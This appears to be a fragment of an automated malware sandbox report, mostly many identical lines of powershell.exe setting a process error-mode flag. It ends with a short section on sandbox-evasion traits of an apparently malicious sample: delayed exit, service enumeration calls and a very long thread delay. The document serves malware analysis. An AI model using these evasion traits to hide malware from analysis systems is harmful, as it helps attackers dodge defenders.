                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Delayed program exit found
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_0040E54F Sleep,ExitProcess,15_2_0040E54F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,15_2_004198C2
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
